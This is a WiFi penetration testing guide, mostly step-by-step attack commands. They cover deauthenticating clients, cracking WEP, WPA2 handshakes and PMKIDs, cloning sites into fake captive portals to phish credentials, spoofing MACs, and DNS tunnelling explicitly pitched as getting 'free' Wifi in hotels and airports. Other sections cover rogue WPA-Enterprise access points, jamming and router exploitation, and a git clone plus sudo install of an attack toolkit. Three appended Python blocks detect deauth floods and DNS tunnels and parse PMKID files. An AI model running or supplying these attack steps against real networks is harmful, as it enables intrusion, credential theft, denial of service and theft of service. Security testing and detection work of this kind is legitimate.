WiFi Penetration Testing Guide

1. Basic commands

Set environment variable

VARIABLE=value

Check interface mode

iwconfig $IFACE

Check interface status

ifconfig $IFACE

Set monitor mode

airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

List networks

  1. Set monitor mode

  2. Run Airodump-ng

      airodump-ng $IFACE -c $CHANNEL -e $ESSID

Deauthentication

  • Only one client

      aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

  • An Access Point (= all the clients in the AP)

      aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

Get hidden SSID with clients

  1. List networks

     List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.

  2. Deauthenticate

     In another terminal, deauthenticate a client or all of them. When Airodump-ng captures a handshake from this network, the name or ESSID will appear in the first terminal:

      aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

Get hidden SSID without clients

  1. List networks

     List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.

  2.a. Execute a dictionary attack

      mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

  2.b. Or execute a bruteforce attack

      mdk3 $IFACE p -t $AP_MAC -c $AP_CHANNEL -b $CHARACTER_SET

     For the character set it is possible to use l (lowercase letters), u (uppercase letters), n (numbers), c (lowercase+uppercase), m (lowercase+uppercase+numbers) or a (all printable characters).

2. Open networks

2.1. Captive portals

2.1.1. Fake captive portals

  1. Clone a website using HTTrack

  2. Install Wifiphisher. Add the HTTrack result in a new folder in wifiphisher/data/phishing-pages/new_page/html and a configuration file in wifiphisher/data/phishing-pages/new_page/config.ini.

  3. Recompile the project using python setup.py install or the binary in bin.

  4. This command works correctly in the latest Kali release after installing hostapd:

      cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. Bypass 1: MAC spoofing

The first method to bypass a captive portal is to change your MAC address to the one of an already authenticated user.

  1. Scan the network and get the list of IP and MAC addresses. You can use:

     • nmap

     • A custom script like this (Bash) or this (Python)

  2. Change your IP and MAC addresses. You can use:

     • macchanger

     • A custom script like this (Bash)

Also, you can use scripts to automate the process like:

2.1.3. Bypass 2: DNS tunnelling

A second method is creating a DNS tunnel. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get "free" Wifi in hotels, airports...

  1. Check that the domain names are resolved:

      nslookup example.com

  2. Create 2 DNS records (in Digital Ocean, Afraid.org...):

     • One "A record": dns.$DOMAIN pointing to $SERVER_IP (Example: dns.domain.com 139.59.172.117)

     • One "NS record": hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com dns.domain.com)

  3. Execution in the server

      iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN

  4. Check if it works correctly

  5. Execution in the client

      iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN

  6. Create the tunnel

      ssh -D 8080 $USER@10.0.0.1

2.2. Man in the Middle attack

Once you are in the network, you can test if it is vulnerable to Man in the Middle attacks.

  1. ARP Spoofing attack using Ettercap

  2. Sniff the traffic using Wireshark or TCPdump

  3. Analyze the traffic using PCredz (Linux) or Network Miner (Windows)

3. WEP cracking

  1. Start capture

      airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE

  2. Accelerate the IV capture using Fake authentication + ARP Request Replay Attack + Deauthenticate user. Stop Airodump-ng at ~100,000 different IVs

      aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
      aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
      aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE

  3. Crack the password using Aircrack-ng

      aircrack-ng $PCAP_FILE

4. WPA2-PSK cracking

4.1. Cracking the 4-way handshake

  1. Start capture

      airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE

  2. Deauthenticate a user. Stop the airodump-ng capture when you see the message 'WPA handshake: $MAC'

      aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE

  3. Crack the handshake

     Option 1: Aircrack-ng

      aircrack-ng -w $WORDLIST capture.cap

     You can get wordlists from here.

     Option 2: Pyrit

      pyrit -r $PCAP_FILE analyze
      pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
      pyrit -i $WORDLIST import_passwords
      pyrit eval
      pyrit batch
      pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. PMKID attack

You can use this script or follow these steps:

  1. Install Hcxdumptool and Hcxtools (you can use this script).

  2. Stop Network Manager

      airmon-ng check kill

  3. If you want to attack a specific MAC address, create a text file ($FILTER_FILE) and add the MAC address without ":". You can use sed and redirect the output to a file:

      echo $MAC | sed 's/://g' > $FILTER_FILE

  4. Capture the PMKID

      hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2

  5. Create $HASH_FILE

      hcxpcaptool -z $HASH_FILE $PCAPNG_FILE

     The structure of each line is: PMKID * ROUTER MAC * STATION MAC * ESSID (the ESSID is hex-encoded; check at: https://www.rapidtables.com/convert/number/hex-to-ascii.html)

  6. Crack it using Hashcat (mode 16800)

      hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force

4.3. AP-less attack

If you have access to a client device with the Wifi connection turned on but there is no network around, you can still attack that network if the client device has previously connected to it.

For that, you have to create a Fake Access Point using hostapd with a configuration file like this one, with any password but the same network name. Create the fake network, the client device will try to connect to it and you get the 4-way handshake as in section 4.1 of this guide.

5. WPA2-Enterprise

5.1. Fake Access Points

Virtual machines download

Operating system   Platform           Credentials          Size      Link
Ubuntu 16.04.5     VMware             ricardojoserf:wifi   3.25 GB
Kali 2019.1        VMware             root:wifi            4.99 GB
Ubuntu 16.04.5     VirtualBox (OVA)   ricardojoserf:wifi   3.18 GB
Kali 2019.1        VirtualBox (OVA)   root:wifi            5.56 GB

Local installation

In case you do not want to use the virtual machine, you can install everything using:

git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh

Hostapd & Freeradius-wpe

Start the Access Point using:

sh freeradius_wpe_init.sh $AP_NAME $INTERFACE

When a client connects, read the logs with:

sh freeradius_wpe_read.sh

Hostapd-wpe

sh hostapd_wpe_init.sh $AP_NAME $INTERFACE

5.2. Brute force

5.3. EAP methods supported

Find supported EAP methods

6. Other attacks

6.1. Krack Attack and Frag Attack

These are two advanced attacks discovered by the great Mathy Vanhoef:

6.2. OSINT

6.3. Wifi Jamming

  • Wifijammer - This program can send deauthentication packets to both APs and clients.

An example to deauthenticate all the devices except a Fake Access Point:

sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC

6.4. Other frameworks

Linux:

  • Wifi Pumpkin - Framework for Rogue WiFi Access Point Attack

  • Eaphammer - Framework for Fake Access Points

  • WEF - Framework for different types of attacks for WPA/WPA2 and WEP, automated hash cracking and more

Windows:

7. Post-exploitation

Once you are connected to the network:

7.1. Attacking the router

  • Routersploit - Exploitation Framework for Embedded Devices - Test "use scanners/autopwn"

7.2. Types of scanners

  • Nmap/Zenmap - Security Scanner, Port Scanner, & Network Exploration Tool

  • Masscan - The faster version of nmap (it can break things, so be careful)

  • Netdiscover - ARP sniffing. Very useful if the networks are very well segmented

7.3. Spoofing

  • Ettercap - Check if you can do a MitM attack and sniff all the traffic in the network
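The deauthentication commands in section 1 and the jamming tool in section 6.3 both work by flooding deauthentication frames, and that flood is what a wireless IDS keys on. The following detector is an added example, not code from this guide or its author: it runs a sliding window over constructed management-frame metadata (the sample records, the subtype numbers and the thresholds are assumptions made for the example) and flags any BSSID that receives more deauthentication frames in a window than a normal network ever sends.

```python
from collections import defaultdict, deque

DEAUTH = 12                      # 802.11 management subtype: deauthentication
BEACON = 8                       # 802.11 management subtype: beacon
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample, not a real capture: (timestamp_s, subtype, bssid, receiver_addr).
# BSSID ...:01 sees a single deauth (a client leaving normally); BSSID ...:02 receives
# 60 broadcast deauths within 1.5 s, the pattern "aireplay-ng -0" or a jammer produces.
SAMPLE_FRAMES = [
    (0.00, BEACON, "aa:bb:cc:dd:ee:01", BROADCAST),
    (0.10, BEACON, "aa:bb:cc:dd:ee:02", BROADCAST),
    (0.20, DEAUTH, "aa:bb:cc:dd:ee:01", "11:22:33:44:55:66"),
] + [
    (1.0 + i * 0.025, DEAUTH, "aa:bb:cc:dd:ee:02", BROADCAST) for i in range(60)
]


def detect_deauth_floods(frames, window_s=5.0, threshold=20):
    """Return {bssid: (peak_count, broadcast_ratio)} for every BSSID whose
    deauthentication frames exceed `threshold` inside some `window_s` sliding
    window. `frames` must be sorted by timestamp."""
    recent = defaultdict(deque)              # bssid -> deauth timestamps in the window
    peak = {}                                # bssid -> highest count seen in a window
    totals = defaultdict(lambda: [0, 0])     # bssid -> [all deauths, broadcast deauths]
    for ts, subtype, bssid, receiver in frames:
        if subtype != DEAUTH:
            continue
        window = recent[bssid]
        window.append(ts)
        while window and ts - window[0] > window_s:   # drop frames older than the window
            window.popleft()
        totals[bssid][0] += 1
        totals[bssid][1] += receiver == BROADCAST
        if len(window) > peak.get(bssid, 0):
            peak[bssid] = len(window)
    flagged = {}
    for bssid, count in peak.items():
        if count > threshold:
            total, broadcast = totals[bssid]
            flagged[bssid] = (count, broadcast / total)
    return flagged


if __name__ == "__main__":
    for bssid, (count, ratio) in detect_deauth_floods(SAMPLE_FRAMES).items():
        print(f"ALERT: deauth flood against {bssid}: {count} frames in one window, "
              f"{ratio:.0%} addressed to broadcast")
```

A high broadcast ratio is the tell for the "whole access point" variant of the command; a flood aimed at one station shows up as a ratio near zero with the same peak count. The mitigation on the network side is Protected Management Frames (802.11w), which makes unauthenticated deauthentication frames from a third party ignorable by clients.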
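The DNS tunnel in section 2.1.3 only works because the captive portal lets DNS through unfiltered, and its traffic has a recognisable shape: many queries for long, high-entropy labels under one zone, often with record types a browser never asks for. This detector is an added example, not part of the guide, and runs over constructed resolver log lines in an assumed "<timestamp> <client> <qtype> <qname>" layout; the zone heuristic (last three labels), the thresholds and the sample data are all assumptions made for the example.

```python
import hashlib
import math
from collections import Counter, defaultdict

# Constructed resolver log, not from a real system. The first lines are ordinary
# lookups; the last 40 imitate an iodine-style tunnel: NULL queries for long
# pseudo-random labels under one delegated zone (hack.example.com here).
BENIGN = [
    "1700000000 10.0.0.5 A www.example.org",
    "1700000001 10.0.0.5 A cdn.example.org",
    "1700000002 10.0.0.7 AAAA mail.example.org",
    "1700000003 10.0.0.7 A img.static.cdn.example.org",
]
TUNNEL = [
    f"{1700000010 + i} 10.0.0.9 NULL "
    f"{hashlib.sha256(f'chunk{i}'.encode()).hexdigest()[:32]}.hack.example.com"
    for i in range(40)
]
SAMPLE_LOG = "\n".join(BENIGN + TUNNEL)

RARE_QTYPES = {"NULL", "TXT", "CNAME", "MX"}   # types tunnels lean on, browsers rarely use


def shannon_entropy(s):
    """Bits of entropy per character of the empirical symbol distribution of s."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_zone(qname, depth=3):
    """Assumption for this example: the last `depth` labels are the delegated zone.
    A production detector would use a public-suffix list instead."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-depth:]) if len(labels) >= depth else qname


def detect_dns_tunnels(log_text, min_queries=20, min_label_len=20, min_entropy=3.0):
    """Return one finding per (client, zone) whose subdomain labels are long,
    high-entropy and almost never repeated, the signature of data in the QNAME."""
    stats = defaultdict(lambda: {"n": 0, "len": 0, "ent": 0.0, "rare": 0, "unique": set()})
    for line in log_text.splitlines():
        _ts, client, qtype, qname = line.split()
        zone = registered_zone(qname)
        if not qname.endswith("." + zone):          # query for the zone apex: no payload
            continue
        sub = qname[: -len(zone) - 1]
        first_label = sub.split(".")[0]              # the label the tunnel client fills
        s = stats[(client, zone)]
        s["n"] += 1
        s["len"] += len(first_label)
        s["ent"] += shannon_entropy(first_label)
        s["rare"] += qtype in RARE_QTYPES
        s["unique"].add(sub)
    findings = []
    for (client, zone), s in stats.items():
        if s["n"] < min_queries:
            continue
        mean_len, mean_ent = s["len"] / s["n"], s["ent"] / s["n"]
        unique_ratio = len(s["unique"]) / s["n"]
        if mean_len >= min_label_len and mean_ent >= min_entropy and unique_ratio > 0.9:
            findings.append({
                "client": client, "zone": zone, "queries": s["n"],
                "mean_label_len": round(mean_len, 1), "mean_entropy": round(mean_ent, 2),
                "rare_qtype_ratio": round(s["rare"] / s["n"], 2),
            })
    return findings


if __name__ == "__main__":
    for f in detect_dns_tunnels(SAMPLE_LOG):
        print(f"ALERT: possible DNS tunnel from {f['client']} via {f['zone']}: "
              f"{f['queries']} queries, mean label {f['mean_label_len']} chars, "
              f"entropy {f['mean_entropy']}, rare qtypes {f['rare_qtype_ratio']:.0%}")
```

The portal-side fix is the same in both directions: a captive portal that resolves every name to itself until the user has authenticated (rather than forwarding arbitrary queries upstream) leaves no channel for the tunnel to use.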
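Section 4.2 describes the line layout of the PMKID hash file (PMKID * ROUTER MAC * STATION MAC * ESSID, with the ESSID as hex). The parser below is an added example, not part of the guide or of hcxtools, for reading such a file during an assessment and reporting which access points leaked a PMKID and from which stations. It goes slightly beyond the page: besides the 16800 layout it also accepts the newer hashcat 22000 layout (WPA*01*PMKID*MAC_AP*MAC_STA*ESSIDhex***) that current hcxtools emit for PMKIDs. All sample lines are constructed, not real captures.

```python
import re
from collections import defaultdict

HEX = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample lines (not real captures). Lines 1-2 use the 16800 layout the
# guide describes; line 3 carries the same kind of data in the 22000 layout; line 4
# is malformed on purpose to show the validation path.
SAMPLE_LINES = """\
0123456789abcdef0123456789abcdef*aabbccddee01*112233445566*486f6d654e6574776f726b
fedcba9876543210fedcba9876543210*aabbccddee01*665544332211*486f6d654e6574776f726b
WPA*01*00112233445566778899aabbccddeeff*aabbccddee02*112233445566*4f6666696365***
not*a*valid*line
"""


def fmt_mac(hex12):
    """'aabbccddee01' -> 'aa:bb:cc:dd:ee:01'."""
    return ":".join(hex12[i:i + 2] for i in range(0, 12, 2)).lower()


def parse_pmkid_line(line):
    """Parse one PMKID line (16800 layout, or 22000 layout of type 01).
    Returns a dict; raises ValueError naming the first problem found."""
    fields = line.strip().split("*")
    if len(fields) >= 6 and fields[0] == "WPA" and fields[1] == "01":
        layout, pmkid, mac_ap, mac_sta, essid_hex = "22000", *fields[2:6]
    elif len(fields) == 4:
        layout, (pmkid, mac_ap, mac_sta, essid_hex) = "16800", fields
    else:
        raise ValueError(f"unexpected field count {len(fields)}")
    # PMKID is 16 bytes, MACs are 6 bytes, all hex-encoded.
    for name, value, length in (("PMKID", pmkid, 32), ("MAC_AP", mac_ap, 12), ("MAC_STA", mac_sta, 12)):
        if len(value) != length or not HEX.match(value):
            raise ValueError(f"{name} must be {length} hex chars, got {value!r}")
    if not essid_hex or len(essid_hex) % 2 or not HEX.match(essid_hex):
        raise ValueError(f"ESSID must be even-length hex, got {essid_hex!r}")
    essid = bytes.fromhex(essid_hex)
    if len(essid) > 32:                      # 802.11 SSID maximum
        raise ValueError("ESSID longer than 32 bytes")
    return {
        "layout": layout,
        "pmkid": pmkid.lower(),
        "ap": fmt_mac(mac_ap),
        "station": fmt_mac(mac_sta),
        "essid": essid.decode("utf-8", errors="replace"),
    }


def summarise(text):
    """Group valid lines by (ESSID, AP MAC) -> [station MACs]; collect (lineno, error)
    for lines that do not parse, so a truncated or mixed file is noticed."""
    by_ap, errors = defaultdict(list), []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            rec = parse_pmkid_line(line)
        except ValueError as exc:
            errors.append((lineno, str(exc)))
            continue
        by_ap[(rec["essid"], rec["ap"])].append(rec["station"])
    return dict(by_ap), errors


if __name__ == "__main__":
    groups, errors = summarise(SAMPLE_LINES)
    for (essid, ap), stations in groups.items():
        print(f"{essid!r} ({ap}): PMKID observed for {len(stations)} station(s): {', '.join(stations)}")
    for lineno, err in errors:
        print(f"line {lineno}: skipped ({err})")
```

The grouping is what matters in a report: a PMKID ties a specific AP and its passphrase to an offline guessing attempt, so each (ESSID, AP) pair in the output is one network whose passphrase strength decides the outcome. A long random passphrase, or moving the network to WPA3-SAE, removes the exposure.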